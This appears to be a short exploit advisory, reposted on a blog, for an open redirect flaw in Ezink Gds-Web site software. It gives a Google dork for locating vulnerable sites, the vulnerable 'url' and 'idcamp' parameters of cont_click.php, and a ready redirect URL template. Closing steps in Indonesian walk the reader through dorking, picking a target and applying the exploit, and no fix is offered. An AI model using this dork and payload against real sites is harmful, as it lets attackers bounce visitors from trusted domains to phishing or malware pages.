Desarollo por Ezink Gds-Web Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/10/2019
# Vendor Homepage : ezink.com - gds-web.com.ar
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/home/cont_click.php?url=
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Vulnerable File :
*****************
/home/cont_click.php
# Vulnerable Parameters :
***********************
?url=
&idcamp=
# Open Redirection Exploit :
**************************
/home/cont_click.php?url=[REDIRECTADDRESS.GOV]&idcamp=[ID-NUMBER]
####################################################################
1. Dorking .........
2. Pilih target
3. Lalu masukan Exploitnya contoh target.com/home/cont_click.php?url=[REDIRECTADDRESS.GOV]&idcamp=[ID-NUMBER]
4. Ntar bakal redirect
Posting Komentar